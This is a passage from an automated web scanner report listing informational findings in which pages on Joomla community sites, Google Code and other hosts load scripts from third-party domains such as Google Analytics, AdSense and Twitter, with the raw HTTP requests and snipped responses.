21.12. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/jsapi

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 00:57:12 GMT
Accept-Ranges: bytes
ETag: "ac6a35cd2abccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:57:16 GMT
Content-Length: 1525922

<html><head><title>SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89</title>
   <meta name="description" content="XSS, Cross Site Scripting, XPath Injection, SQL Injection, DORK, CWE-79, CAPEC-8
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.13. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUt
...[SNIP]...
lick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?" WIDTH=120 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
...[SNIP]...

21.14. http://cherne.net/brian/resources/jquery.hoverIntent.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cherne.net
Path:   /brian/resources/jquery.hoverIntent.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/ga.js

Request

GET /brian/resources/jquery.hoverIntent.html HTTP/1.1
Host: cherne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:40 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 02:34:12 GMT
ETag: "583c1ea-2ab4-486485c59d100"
Accept-Ranges: bytes
Content-Length: 10932
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-Type" cont
...[SNIP]...
<!-- close #pageContent -->

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

21.15. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js
  • http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

21.16. http://community.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: community.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.3.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.17. http://community.joomla.org/blogs/community.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/community.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.18. http://community.joomla.org/blogs/community/1390-jdaychile.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/community/1390-jdaychile.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1390-jdaychile.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.19. http://community.joomla.org/blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 168792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.20. http://community.joomla.org/blogs/community/1398-joomladay-chile-2011-recap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/community/1398-joomladay-chile-2011-recap.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1398-joomladay-chile-2011-recap.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.21. http://community.joomla.org/blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.22. http://community.joomla.org/blogs/leadership/1391-joomla-16-presented-at-codemash.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/leadership/1391-joomla-16-presented-at-codemash.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1391-joomla-16-presented-at-codemash.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.23. http://community.joomla.org/blogs/leadership/1395-the-path-forward-migration-and-the-future.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /blogs/leadership/1395-the-path-forward-migration-and-the-future.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1395-the-path-forward-migration-and-the-future.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.24. http://community.joomla.org/connect.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /connect.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /connect.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.25. http://community.joomla.org/connect/social.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /connect/social.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://friendfeed.com/embed/widget/joomla?v=2&num=30&hide_logo=1&hide_comments_likes=1&hide_subscribe=1
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /connect/social.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32050


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://friendfeed.com/embed/widget/joomla?v=2&amp;num=30&amp;hide_logo=1&amp;hide_comments_likes=1&amp;hide_subscribe=1"></script>
...[SNIP]...

21.26. http://community.joomla.org/events.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /events.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
